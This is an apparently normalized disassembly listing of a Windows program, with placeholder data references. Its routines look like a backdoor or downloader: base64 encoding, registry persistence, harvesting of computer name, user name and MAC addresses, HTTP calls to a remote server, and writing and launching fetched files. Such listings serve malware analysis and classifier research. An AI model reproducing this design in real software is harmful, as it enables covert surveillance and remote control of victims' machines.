sub_401000
push esi
push edi
mov edi [ esp + 0x10 ]
mov eax 0x55555556
lea ecx [ edi * 4 ]
imul ecx
mov eax edx
shr eax 0x1f
lea ecx [ edx + eax + 0x4 ]
push ecx
call malloc
mov edx [ esp + 0x10 ]
mov esi eax
push esi
push edi
push edx
call sub_401040
add esp 0x10
mov eax esi
pop edi
pop esi
retn
sub_401040
push ebp
mov ebp [ esp + 0xc ]
push esi
mov esi [ esp + 0x14 ]
cmp ebp 0x3
jl r-xdata
mov eax [ esp + 0xc ]
mov eax 0xaaaaaaab
push edi
mul ebp
mov edi edx
shr edi 0x1
lea eax [ edi * 4 ]
sub eax edi
neg eax
add ebp eax
mov eax [ esp + 0x10 ]
mov ecx [ esp + 0x14 ]
mov [ esi ] 0x0
mov eax esi
pop esi
sub eax ecx
pop ebp
retn
xor ecx ecx
mov cl [ eax ]
shr ecx 0x2
cmp ebp 0x1
mov dl [ ecx + rw-data ]
mov cl 0x3d
mov [ esi ] dl
jne r-xdata
xor ecx ecx
add esi 0x4
mov cl [ eax ]
add eax 0x3
shr ecx 0x2
mov dl [ ecx + rw-data ]
mov [ esi - 0x4 ] dl
mov cl [ eax - 0x3 ]
xor edx edx
and ecx 0x3
mov dl [ eax - 0x2 ]
shl ecx 0x4
shr edx 0x4
or ecx edx
mov cl [ ecx + rw-data ]
mov [ esi - 0x3 ] cl
mov dl [ eax - 0x2 ]
xor ecx ecx
and edx 0xf
mov cl [ eax - 0x1 ]
shl edx 0x2
shr ecx 0x6
or edx ecx
mov dl [ edx + rw-data ]
mov [ esi - 0x2 ] dl
mov cl [ eax - 0x1 ]
and ecx 0x3f
dec edi
mov dl [ ecx + rw-data ]
mov [ esi - 0x1 ] dl
jne r-xdata
pop edi
jmp r-xdata
mov dl [ eax ]
push ebx
xor ebx ebx
and edx 0x3
mov bl [ eax + 0x1 ]
shl edx 0x4
shr ebx 0x4
or edx ebx
pop ebx
mov dl [ edx + rw-data ]
mov [ esi + 0x1 ] dl
mov al [ eax + 0x1 ]
and eax 0xf
add esi 0x4
mov dl [ eax * 4 + rw-data ]
mov [ esi - 0x2 ] dl
mov [ esi - 0x1 ] cl
mov al [ eax ]
add esi 0x4
and eax 0x3
shl eax 0x4
mov dl [ eax + rw-data ]
mov [ esi - 0x2 ] cl
mov [ esi - 0x3 ] dl
mov [ esi - 0x1 ] cl
mov ecx [ esp + 0x14 ]
mov [ esi ] 0x0
mov eax esi
pop esi
sub eax ecx
pop ebp
retn
test ebp ebp
jle r-xdata
sub_401160
push ebp
mov ebp esp
push 0xffffffff
push sub_403c20
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x730
push ebx
push esi
push edi
mov [ ebp - 0x10 ] esp
push rw-data
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call sub_403b20
mov ecx 0x40
xor eax eax
lea edi [ ebp - 0x237 ]
mov [ ebp - 0x238 ] 0x0
[ edi ]
stosw [ edi ]
add esp 0xc
mov [ ebp - 0x18 ] 0x104
stosb [ edi ]
lea eax [ ebp - 0x14 ]
push eax
push 0x20019
push 0x0
push rw-data
push 0x80000001
call [ RegOpenKeyExA@IAT ]
mov eax [ ebp - 0x14 ]
lea ecx [ ebp - 0x18 ]
lea edx [ ebp - 0x238 ]
push ecx
push edx
push 0x0
push 0x0
push rw-data
push eax
call [ RegQueryValueExA@IAT ]
mov ecx [ ebp - 0x14 ]
push ecx
call [ RegCloseKey@IAT ]
lea edx [ ebp - 0x238 ]
lea eax [ ebp - 0x33c ]
push edx
push rw-data
push eax
call sprintf
lea ecx [ ebp - 0x33c ]
push rw-data
push ecx
call strtok
lea edx [ ebp - 0x33c ]
push rw-data
push edx
mov esi eax
call strstr
add esp 0x1c
test eax eax
je r-xdata
push 0x1
mov [ ebp - 0x4 ] 0x0
call _sleep
mov esi [ PostThreadMessageA@IAT ]
mov edi [ GetCurrentThreadId@IAT ]
mov ebx [ Sleep@IAT ]
add esp 0x4
push 0x0
push esi
call _access
add esp 0x8
test eax eax
jne r-xdata
push 0x64
call ebx
push 0x0
call ebx
jmp r-xdata
push 0x0
push 0x0
lea eax [ ebp - 0x134 ]
push 0x0
push eax
call [ GetMessageA@IAT ]
push 0x1
push rw-data
call [ InitializeSecurityDescriptor@IAT ]
xor ebx ebx
push ebx
push ebx
push 0x1
push rw-data
call [ SetSecurityDescriptorDacl@IAT ]
mov ecx [ rw-data ]
mov [ rw-data ] rw-data
push ecx
push rw-data
push rw-data
mov [ rw-data ] 0xc
mov [ rw-data ] 0x1
call sprintf
add esp 0xc
lea edx [ ebp - 0x118 ]
push 0x104
push edx
push ebx
call [ GetModuleFileNameA@IAT ]
lea eax [ ebp - 0x118 ]
push eax
push rw-data
push rw-data
call sprintf
push rw-data
push rw-data
push rw-data
push rw-data
call sprintf
add esp 0x1c
call sub_402b30
lea ecx [ ebp - 0x118 ]
push 0x5c
push ecx
call strrchr
mov esi eax
lea edx [ esi + 0x1 ]
push edx
push rw-data
push rw-data
call sprintf
push rw-data
mov [ esi ] bl
call sub_403b20
add esp 0x18
push rw-data
push rw-data
call sub_4017d0
add esp 0x8
push rw-data
push ebx
push ebx
call [ CreateMutexA@IAT ]
mov esi [ GetLastError@IAT ]
call esi
cmp eax 0xb7
je r-xdata
push rw-data
push esi
call strstr
add esp 0x8
test eax eax
jne r-xdata
push 0x1
call _sleep
add esp 0x4
push 0x0
push 0x0
push 0x0
call edi
push eax
call esi
test eax eax
je r-xdata
mov ecx [ ebp - 0xc ]
pop edi
pop esi
xor eax eax
mov [ fs : 0x0 ] ecx
pop ebx
mov esp ebp
pop ebp
retn 0x10
call esi
cmp eax 0x5
je r-xdata
push 0x3e8
call _sleep
push rw-data
mov [ rw-data ] ebx
call sub_403b20
add esp 0x8
lea ecx [ ebp - 0x118 ]
push rw-data
push ecx
push rw-data
push rw-data
call sprintf
add esp 0x10
push rw-data
call [ PathFileExistsA@IAT ]
test eax eax
je r-xdata
lea eax [ ebx + ebx * 4 ]
lea edi [ eax * 2 + rw-data ]
push edi
call sub_403b20
add esp 0x4
mov esi rw-data
mov eax edi
push rw-data
call sub_403b20
add esp 0x4
lea ecx [ ebp - 0x118 ]
push rw-data
push ecx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_403b20
add esp 0x14
lea edx [ ebp - 0x118 ]
push rw-data
push edx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
cmp eax 0x1
je r-xdata
push rw-data
push rw-data
call fopen
mov edi eax
add esp 0x8
test edi edi
je r-xdata
sbb eax eax
sbb eax 0xffffffff
test cl cl
je r-xdata
push rw-data
call sub_403b20
add esp 0x4
lea eax [ ebp - 0x118 ]
push rw-data
push eax
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
push rw-data
call sub_403b20
add esp 0x4
lea ecx [ ebp - 0x118 ]
push rw-data
push ecx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
push rw-data
call sub_403b20
add esp 0x4
lea edx [ ebp - 0x118 ]
push rw-data
push edx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
push rw-data
call sub_403b20
add esp 0x4
lea eax [ ebp - 0x118 ]
push rw-data
push eax
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
push rw-data
call sub_403b20
add esp 0x4
lea ecx [ ebp - 0x118 ]
push rw-data
push ecx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
push rw-data
call sub_403b20
add esp 0x4
lea edx [ ebp - 0x118 ]
push rw-data
push edx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
push rw-data
call sub_403b20
add esp 0x4
lea eax [ ebp - 0x118 ]
push rw-data
push eax
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
push rw-data
call sub_403b20
add esp 0x4
lea ecx [ ebp - 0x118 ]
push rw-data
push ecx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
cmp eax 0x8
jne r-xdata
xor esi esi
mov eax ebx
shl eax 0x6
add eax rw-data
push eax
call sub_403b20
add esp 0x4
inc ebx
jmp r-xdata
mov [ rw-data ] ebx
xor eax eax
jmp r-xdata
mov dl [ eax + 0x1 ]
mov cl dl
cmp dl [ esi + 0x1 ]
jne r-xdata
push rw-data
call sub_403b20
add esp 0x4
lea edx [ ebp - 0x118 ]
push rw-data
push edx
push rw-data
push rw-data
call sprintf
push rw-data
call sub_4027f0
add esp 0x14
call sub_401850
push 0x0
call exit
push edi
mov [ ebp + esi - 0x73c ] 0x0
call fclose
lea edx [ ebp - 0x73c ]
push edx
call sub_403b20
mov edx [ rw-data ]
add esp 0x8
xor edi edi
push edi
call getc
add esp 0x4
cmp eax 0xffffffff
je r-xdata
cmp ebx [ rw-data ]
jge r-xdata
test eax eax
jne r-xdata
add eax 0x2
add esi 0x2
test cl cl
jne r-xdata
mov [ rw-data ] 0x0
jmp r-xdata
lea eax [ edi + edi * 4 ]
lea esi [ eax * 2 + rw-data ]
lea eax [ ebp - 0x73c ]
cmp eax 0x20
jl r-xdata
mov dl [ eax ]
mov cl dl
cmp dl [ esi ]
jne r-xdata
sbb eax eax
sbb eax 0xffffffff
test cl cl
je r-xdata
cmp eax 0x7e
jg r-xdata
cmp edi edx
jl r-xdata
inc edi
jmp r-xdata
xor eax eax
jmp r-xdata
mov bl [ eax + 0x1 ]
mov cl bl
cmp bl [ esi + 0x1 ]
jne r-xdata
mov [ ebp + esi - 0x73c ] al
inc esi
jmp r-xdata
mov [ rw-data ] edi
cmp edi edx
jge r-xdata
test eax eax
je r-xdata
add eax 0x2
add esi 0x2
test cl cl
jne r-xdata
cmp esi 0x3ff
jge r-xdata
mov bl [ eax ]
mov cl bl
cmp bl [ esi ]
jne r-xdata
sub_4017d0
sub esp 0x8
lea eax [ esp + 0x4 ]
lea ecx [ esp ]
push eax
push ecx
push 0x0
push 0xf003f
push 0x0
push 0x0
push 0x0
push rw-data
push 0x80000001
call [ RegCreateKeyExA@IAT ]
test eax eax
jne r-xdata
xor eax eax
add esp 0x8
retn
mov edx [ esp + 0x10 ]
push esi
push edi
mov edi edx
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
push ecx
push edx
mov edx [ esp + 0x1c ]
push 0x1
push eax
mov eax [ esp + 0x18 ]
push edx
push eax
call [ RegSetValueExA@IAT ]
mov ecx [ esp + 0x8 ]
mov esi eax
push ecx
call [ RegCloseKey@IAT ]
pop edi
test esi esi
pop esi
jne r-xdata
mov eax 0x1
add esp 0x8
retn
sub_401850
sub esp 0xbc
mov eax [ rw-data ]
mov ecx [ rw-data ]
mov edx [ rw-data ]
push ebx
push ebp
push esi
push edi
mov [ esp + 0x3c ] eax
mov al [ rw-data ]
xor edi edi
push rw-data
mov [ esp + 0x18 ] edi
mov [ esp + 0x44 ] ecx
mov [ esp + 0x48 ] edx
mov [ esp + 0x4c ] al
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call sub_403b20
push rw-data
call atoi
push rw-data
mov esi eax
call atoi
push rw-data
mov [ esp + 0x50 ] eax
call atoi
push rw-data
mov [ esp + 0x68 ] eax
call atoi
lea ecx [ esp + 0x6c ]
mov [ esp + 0x48 ] eax
push ecx
call sub_403b20
lea eax [ esi + esi * 4 ]
lea eax [ eax + eax * 4 ]
lea edx [ eax + eax * 4 ]
shl edx 0x3
push edx
call _sleep
mov eax [ rw-data ]
add esp 0x38
mov [ esp + 0x20 ] edi
mov [ esp + 0x10 ] eax
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
add esp 0xbc
retn
mov ecx [ esp + 0x10 ]
mov eax [ rw-data ]
cmp ecx eax
jl r-xdata
mov eax [ esp + 0x10 ]
push rw-data
lea edx [ esp + 0x50 ]
lea eax [ eax + eax * 4 ]
lea eax [ eax * 2 + rw-data ]
push eax
push rw-data
push edx
mov [ esp + 0x3c ] eax
call sprintf
lea edi [ esp + 0x5c ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
lea eax [ esp + 0x5c ]
mov ebp ecx
push ebp
push eax
call sub_4027b0
lea ecx [ esp + 0x64 ]
push ebp
push ecx
call sub_401000
mov ecx [ esp + 0x38 ]
mov [ esp + 0x3c ] eax
mov eax 0x1
add esp 0x20
cmp ecx eax
mov [ esp + 0x30 ] eax
jl r-xdata
mov [ esp + 0x10 ] edi
mov eax [ esp + 0x1c ]
xor edi edi
cmp eax edi
je r-xdata
mov eax [ esp + 0x14 ]
test eax eax
jne r-xdata
push 0x64
call _sleep
mov eax [ esp + 0x24 ]
mov edx [ esp + 0x14 ]
add esp 0x4
inc eax
inc edx
cmp eax 0xa
mov [ esp + 0x20 ] eax
mov [ esp + 0x10 ] edx
jl r-xdata
push eax
call free
add esp 0x4
call sub_401d70
call sub_402a90
test al al
jne r-xdata
cmp [ esp + 0x14 ] edi
jne r-xdata
mov eax [ rw-data ]
lea edx [ esp + 0x3c ]
push edx
push eax
call strstr
add esp 0x8
test eax eax
je r-xdata
call sub_402a00
test al al
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xbc
retn
mov edx [ rw-data ]
or ecx 0xffffffff
mov edi edx
xor eax eax
[ edi ]
not ecx
dec ecx
mov esi ecx
push esi
push edx
call sub_4027b0
mov ecx [ rw-data ]
push esi
push ecx
call sub_401000
mov [ rw-data ] eax
mov eax [ rw-data ]
add esp 0x10
test eax eax
je r-xdata
mov edx [ rw-data ]
mov eax [ esp + 0x1c ]
push rw-data
push edx
push rw-data
push eax
push rw-data
push rw-data
push rw-data
call sprintf
mov eax [ rw-data ]
add esp 0x1c
test eax eax
je r-xdata
push eax
call free
add esp 0x4
mov ecx [ esp + 0x10 ]
push 0x1
shl ecx 0x6
add ecx rw-data
push 0x50
push ecx
push 0x0
push rw-data
call sub_402530
mov ebx eax
mov eax [ rw-data ]
add esp 0x14
cmp eax 0x6
mov [ esp + 0x28 ] ebx
jl r-xdata
push eax
call free
add esp 0x4
mov eax [ esp + 0x24 ]
lea eax [ eax + eax * 4 ]
lea eax [ eax + eax * 4 ]
lea eax [ eax + eax * 4 ]
shl eax 0x3
push eax
call _sleep
test ebx ebx
je r-xdata
jmp r-xdata
push rw-data
push ebx
call strstr
mov esi eax
add esp 0x8
test esi esi
je r-xdata
mov eax [ esp + 0x24 ]
lea eax [ eax + eax * 4 ]
lea eax [ eax + eax * 4 ]
lea edx [ eax + eax * 4 ]
shl edx 0x3
push edx
call _sleep
add esp 0x4
push ebx
call free
jmp r-xdata
mov edi rw-data
or ecx 0xffffffff
xor eax eax
push 0x2
[ edi ]
not ecx
dec ecx
push rw-data
add esi ecx
push esi
call strncmp
add esp 0xc
test eax eax
je r-xdata
mov eax [ esp + 0x34 ]
mov ecx [ esp + 0x1c ]
add esp 0x4
inc eax
cmp eax ecx
mov [ esp + 0x30 ] eax
jle r-xdata
push ebx
call free
add esp 0x4
push 0x2
push rw-data
push esi
call strncmp
add esp 0xc
test eax eax
jne r-xdata
push 0x2
push rw-data
push esi
call strncmp
add esp 0xc
test eax eax
jne r-xdata
push rw-data
push rw-data
mov [ esp + 0x1c ] 0x1
call fopen
add esp 0x8
mov [ rw-data ] eax
test eax eax
je r-xdata
push ebx
call free
jmp r-xdata
push rw-data
push rw-data
mov [ esp + 0x1c ] 0x1
call fopen
add esp 0x8
mov [ rw-data ] eax
test eax eax
je r-xdata
mov edx [ esp + 0x2c ]
lea eax [ esp + 0x4c ]
push edx
push rw-data
push eax
call sprintf
lea ecx [ esp + 0x58 ]
push ecx
call sub_403b20
mov eax [ rw-data ]
lea edx [ esp + 0x5c ]
push edx
push rw-data
push eax
call fprintf
mov ecx [ rw-data ]
push ecx
call fclose
add esp 0x20
push ebx
call free
jmp r-xdata
lea edx [ esi + 0x2 ]
push rw-data
push edx
call strtok
push eax
call _strdup
mov ebx eax
add esp 0xc
test ebx ebx
je r-xdata
mov edx [ esp + 0x2c ]
lea eax [ esp + 0x4c ]
push edx
push rw-data
push eax
call sprintf
lea ecx [ esp + 0x58 ]
push ecx
call sub_403b20
mov eax [ rw-data ]
lea edx [ esp + 0x5c ]
push edx
push rw-data
push eax
call fprintf
mov ecx [ rw-data ]
push ecx
call fclose
add esp 0x20
lea esi [ esi + ebp + 0x2 ]
test esi esi
je r-xdata
push ebx
call atoi
mov [ esp + 0x38 ] eax
mov edi ebx
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
push ebx
mov ebp ecx
inc ebp
call free
add esp 0x8
mov ebx [ esp + 0x28 ]
mov edi [ esp + 0x34 ]
push edi
push esi
call sub_4027b0
push rw-data
push rw-data
call fopen
add esp 0x10
mov [ rw-data ] eax
test eax eax
je r-xdata
push rw-data
call sub_4024a0
mov eax [ esp + 0x3c ]
lea eax [ eax + eax * 4 ]
lea eax [ eax + eax * 4 ]
lea ecx [ eax + eax * 4 ]
shl ecx 0x3
push ecx
call _sleep
push rw-data
call sub_4027f0
add esp 0xc
push eax
push edi
push 0x1
push esi
call fwrite
mov eax [ rw-data ]
push eax
call fclose
add esp 0x14
sub_401d70
mov eax 0x18b4
call sub_4037c0
push esi
push edi
call sub_402380
mov al [ rw-data ]
test al al
je r-xdata
mov ecx 0xb
mov esi rw-data
lea edi [ esp + 0x88 ]
push ebx
[ edi ] [ esi ]
movsw [ edi ] [ esi ]
movsb [ edi ] [ esi ]
mov ecx 0x5
mov esi rw-data
lea edi [ esp + 0x10 ]
push ebp
[ edi ] [ esi ]
lea ecx [ esp + 0x90 ]
mov [ esp + 0xbf ] 0x0
push ecx
mov [ esp + 0x2c ] 0x0
call sub_403b20
lea edx [ esp + 0x18 ]
push edx
call sub_403b20
add esp 0x8
lea eax [ esp + 0x90 ]
push rw-data
push 0x20019
push 0x0
push eax
push 0x80000002
call [ RegOpenKeyExA@IAT ]
mov ebp [ RegQueryValueExA@IAT ]
mov [ rw-data ] eax
test eax eax
jne r-xdata
push rw-data
call sub_402c20
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
push ecx
push rw-data
push rw-data
call sub_402c60
push rw-data
push rw-data
call sub_402d50
add esp 0x18
xor esi esi
mov edi rw-data
mov ecx [ rw-data ]
mov ebx [ RegCloseKey@IAT ]
push ecx
call ebx
mov ecx 0xb
mov esi rw-data
lea edi [ esp + 0x5c ]
lea edx [ esp + 0x5c ]
[ edi ] [ esi ]
movsw [ edi ] [ esi ]
push edx
mov [ esp + 0x8e ] 0x0
call sub_403b20
add esp 0x4
lea eax [ esp + 0x5c ]
push rw-data
push 0x20019
push 0x0
push eax
push 0x80000002
call [ RegOpenKeyExA@IAT ]
test eax eax
mov [ rw-data ] eax
jne r-xdata
mov ecx 0x100
xor eax eax
lea edi [ esp + 0xc4 ]
push rw-data
[ edi ]
lea ecx [ esp + 0xc8 ]
lea edx [ esp + 0x18 ]
push ecx
push rw-data
push eax
mov eax [ rw-data ]
push edx
push eax
mov [ rw-data ] 0x400
call ebp
test eax eax
je r-xdata
xor eax eax
mov al [ esi + rw-data ]
push eax
push rw-data
push 0x20
push edi
call _snprintf
add esp 0x10
inc esi
add edi 0x2
cmp esi 0x10
jl r-xdata
mov [ rw-data ] 0x0
push rw-data
mov ecx 0x100
lea edi [ esp + 0xc4 ]
mov edx [ rw-data ]
push rw-data
[ edi ]
lea ecx [ esp + 0xc8 ]
mov [ rw-data ] 0x400
push ecx
push rw-data
push eax
push rw-data
push edx
call ebp
test eax eax
jne r-xdata
mov al [ esp + 0xc4 ]
mov edx [ rw-data ]
lea ecx [ esp + 0xc4 ]
push rw-data
push ecx
push rw-data
push 0x0
push rw-data
push edx
call ebp
test eax eax
je r-xdata
mov eax [ rw-data ]
push eax
call ebx
mov esi 0x7f
push rw-data
push rw-data
mov [ rw-data ] esi
call [ GetComputerNameA@IAT ]
push rw-data
push rw-data
mov [ rw-data ] esi
call [ GetUserNameA@IAT ]
push 0x280
call malloc
add esp 0x4
lea ecx [ esp + 0x10 ]
mov esi eax
mov [ esp + 0x10 ] 0x280
push ecx
push esi
call GetAdaptersInfo
cmp eax 0x6f
jne r-xdata
mov ecx [ rw-data ]
lea edi [ esp + 0xc4 ]
mov edx ecx
push rw-data
shr ecx 0x2
[ edi ]
mov ecx edx
push rw-data
and ecx 0x3
push rw-data
[ edi ]
mov eax [ rw-data ]
push 0x0
mov esi 0x400
push rw-data
push eax
mov [ rw-data ] esi
call ebp
test eax eax
mov [ rw-data ] eax
je r-xdata
lea eax [ esp + 0xc4 ]
push eax
jmp r-xdata
mov al [ ecx ]
test al al
je r-xdata
cmp al 0x20
je r-xdata
xor al al
mov [ esp + 0xc4 ] al
jmp r-xdata
lea eax [ esp + 0x10 ]
push eax
push esi
call GetAdaptersInfo
test eax eax
jne r-xdata
push esi
call free
mov edx [ esp + 0x14 ]
push edx
call malloc
add esp 0x8
mov esi eax
mov ecx [ rw-data ]
xor eax eax
mov edx ecx
lea edi [ esp + 0xc4 ]
shr ecx 0x2
[ edi ]
mov ecx edx
push rw-data
and ecx 0x3
push rw-data
[ edi ]
mov eax [ rw-data ]
push rw-data
push 0x0
push rw-data
push eax
mov [ rw-data ] esi
call ebp
test eax eax
mov [ rw-data ] eax
je r-xdata
mov [ rw-data ] 0x0
call _strdup
mov ecx [ rw-data ]
add esp 0x4
mov [ rw-data ] eax
push ecx
call ebx
mov ecx 0xb
mov esi rw-data
lea edi [ esp + 0x2c ]
xor edx edx
[ edi ] [ esi ]
movsb [ edi ] [ esi ]
lea eax [ esp + 0x2c ]
mov [ esp + 0x59 ] dx
push eax
mov [ esp + 0x5f ] dl
call sub_403b20
add esp 0x4
lea ecx [ esp + 0x2c ]
push rw-data
push 0x20019
push 0x0
push ecx
push 0x80000002
call [ RegOpenKeyExA@IAT ]
test eax eax
mov [ rw-data ] eax
jne r-xdata
lea eax [ esp + 0xc4 ]
mov [ edx ] 0x0
push eax
call _strdup
add esp 0x4
mov [ rw-data ] eax
mov [ edx ] al
mov al [ ecx + 0x1 ]
inc edx
inc ecx
test al al
jne r-xdata
mov al [ ecx + 0x1 ]
inc ecx
test al al
jne r-xdata
cmp al 0x9
jne r-xdata
test al al
lea ecx [ esp + 0xc4 ]
lea edx [ esp + 0xc4 ]
je r-xdata
lea ecx [ esp + 0x4c4 ]
push rw-data
push ecx
call sprintf
add esp 0x8
test esi esi
mov [ esp + 0x4c4 ] al
mov edx esi
je r-xdata
mov ecx [ rw-data ]
xor eax eax
mov edx ecx
lea edi [ esp + 0xc4 ]
shr ecx 0x2
[ edi ]
mov ecx edx
push rw-data
and ecx 0x3
push rw-data
[ edi ]
mov eax [ rw-data ]
push rw-data
push 0x0
push rw-data
push eax
mov [ rw-data ] esi
call ebp
test eax eax
mov [ rw-data ] eax
je r-xdata
xor esi esi
push rw-data
push rw-data
call fopen
mov edi eax
add esp 0x8
test edi edi
je r-xdata
mov ecx 0x400
xor eax eax
lea edi [ esp + 0x8c4 ]
push rw-data
[ edi ]
call [ PathFileExistsA@IAT ]
pop ebp
pop ebx
test eax eax
je r-xdata
lea edi [ edx + 0x1b0 ]
or ecx 0xffffffff
xor eax eax
lea ebx [ esp + 0x4c4 ]
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
lea ebx [ esp + 0x4c4 ]
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
mov edx [ edx ]
test edx edx
jne r-xdata
mov ecx esi
xor eax eax
lea edi [ esp + 0x8c4 ]
push rw-data
[ edi ]
push rw-data
lea ecx [ esp + 0x8cc ]
push 0x1000
push ecx
call _snprintf
lea edi [ esp + 0x8d4 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x8d4 ]
[ edi ]
not ecx
dec ecx
push ecx
push edx
push rw-data
call strncpy
add esp 0x1c
mov esi [ esp + 0x8 ]
lea edx [ esp + 0x8bc ]
push edx
push rw-data
push edi
call fscanf
lea eax [ esp + 0x8c8 ]
push eax
call atoi
push edi
mov esi eax
call fclose
add esp 0x14
jmp r-xdata
jmp r-xdata
mov esi 0x3e7
jmp r-xdata
cmp esi 0x3e8
jle r-xdata
cmp esi 0x1
jl r-xdata
mov edx [ rw-data ]
mov eax [ rw-data ]
lea ecx [ esp + 0x4bc ]
push rw-data
push ecx
push rw-data
push esi
push rw-data
push rw-data
push edx
push eax
push rw-data
push rw-data
lea ecx [ esp + 0x8e4 ]
push rw-data
push ecx
call sprintf
lea edx [ esp + 0x8ec ]
push edx
call _strdup
add esp 0x34
mov [ rw-data ] eax
xor eax eax
pop edi
pop esi
add esp 0x18b4
retn
sub_402380
mov eax 0x14020
call sub_4037c0
push edi
push rw-data
push rw-data
xor edi edi
call sprintf
add esp 0x8
lea eax [ esp + 0x10 ]
lea ecx [ esp + 0x24 ]
mov [ esp + 0x10 ] 0x14000
push eax
push ecx
call GetAdaptersInfo
xor edx edx
mov [ esp + 0x4 ] edx
test eax eax
mov [ esp + 0x8 ] dx
jne r-xdata
pop edi
add esp 0x14020
retn
push esi
lea esi [ esp + 0x28 ]
mov cl [ esi + eax + 0x194 ]
mov dl [ esp + eax + 0x8 ]
xor dl cl
mov [ esp + eax + 0x8 ] dl
inc eax
cmp eax 0x6
jl r-xdata
mov esi [ esi ]
inc edi
test esi esi
je r-xdata
mov edx [ esp + 0xd ]
mov eax [ esp + 0xc ]
mov ecx [ esp + 0xb ]
and edx 0xff
and eax 0xff
push edx
mov edx [ esp + 0xe ]
and ecx 0xff
push eax
mov eax [ esp + 0x11 ]
push ecx
mov ecx [ esp + 0x14 ]
and edx 0xff
and eax 0xff
push edx
and ecx 0xff
push eax
push ecx
push rw-data
push rw-data
call sprintf
add esp 0x20
pop esi
cmp edi 0xa
jl r-xdata
xor eax eax
xor ecx ecx
mov al [ esi + 0x199 ]
mov cl [ esi + 0x198 ]
xor edx edx
push eax
mov dl [ esi + 0x197 ]
push ecx
xor eax eax
push edx
mov al [ esi + 0x196 ]
xor ecx ecx
mov cl [ esi + 0x195 ]
xor edx edx
mov dl [ esi + 0x194 ]
push eax
push ecx
push edx
lea eax [ esp + 0x30 ]
push rw-data
push eax
call sprintf
add esp 0x20
xor eax eax
sub_4024a0
sub esp 0x6c
push esi
push edi
mov ecx 0x6
mov esi rw-data
lea edi [ esp + 0x18 ]
lea eax [ esp + 0x18 ]
[ edi ] [ esi ]
push eax
call sub_403b20
add esp 0x4
lea ecx [ esp + 0x18 ]
push ecx
push rw-data
call [ GetModuleHandleA@IAT ]
push eax
call [ GetProcAddress@IAT ]
mov edx eax
mov ecx 0x11
xor eax eax
lea edi [ esp + 0x30 ]
[ edi ]
lea eax [ esp + 0x8 ]
lea ecx [ esp + 0x30 ]
push eax
mov eax [ esp + 0x7c ]
push ecx
push 0x0
push 0x0
push 0x20
push 0x0
push 0x0
push 0x0
push 0x0
push eax
mov [ esp + 0x58 ] 0x44
mov [ esp + 0x84 ] 0x81
mov [ esp + 0x88 ] 0x5
call edx
dec eax
pop edi
neg eax
sbb eax eax
pop esi
add esp 0x6c
retn
sub_402530
sub esp 0xa8
push ebx
push ebp
push esi
push edi
mov ecx 0x26
mov esi rw-data
lea edi [ esp + 0x20 ]
lea eax [ esp + 0x20 ]
[ edi ] [ esi ]
push eax
mov [ esp + 0x20 ] 0x4
call sub_403b20
add esp 0x4
lea ecx [ esp + 0x20 ]
push 0x0
push 0x0
push 0x0
push 0x4
push ecx
call [ InternetOpenA@IAT ]
mov ebx eax
test ebx ebx
mov [ esp + 0x18 ] ebx
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xa8
retn
mov edx [ esp + 0xc8 ]
mov eax [ esp + 0xc4 ]
push 0x0
push 0x0
push 0x3
push 0x0
push 0x0
push edx
push eax
push ebx
call [ InternetConnectA@IAT ]
mov ebp eax
test ebp ebp
jne r-xdata
mov eax [ esp + 0xcc ]
dec eax
je r-xdata
push ebx
call [ InternetCloseHandle@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xa8
retn
mov edx [ esp + 0xbc ]
push 0x0
push 0x4400100
push 0x0
push 0x0
push 0x0
push edx
push rw-data
push ebp
call [ HttpOpenRequestA@IAT ]
mov esi eax
test esi esi
jne r-xdata
dec eax
jne r-xdata
push 0x0
push 0x0
push 0x0
push 0x0
push esi
call [ HttpSendRequestA@IAT ]
jmp r-xdata
mov esi [ InternetCloseHandle@IAT ]
push ebp
call esi
push ebx
call esi
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xa8
retn
mov esi [ esp + 0x14 ]
mov ecx [ esp + 0xbc ]
push 0x0
push 0x4400100
push 0x0
push 0x0
push 0x0
push ecx
push rw-data
push ebp
call [ HttpOpenRequestA@IAT ]
mov esi eax
test esi esi
jne r-xdata
lea eax [ esp + 0x1c ]
push 0x0
lea ecx [ esp + 0x14 ]
push eax
push ecx
push 0x20000013
push esi
call [ HttpQueryInfoA@IAT ]
mov eax [ esp + 0x10 ]
cmp eax 0x197
je r-xdata
push 0x3e8
call _sleep
add esp 0x4
test esi esi
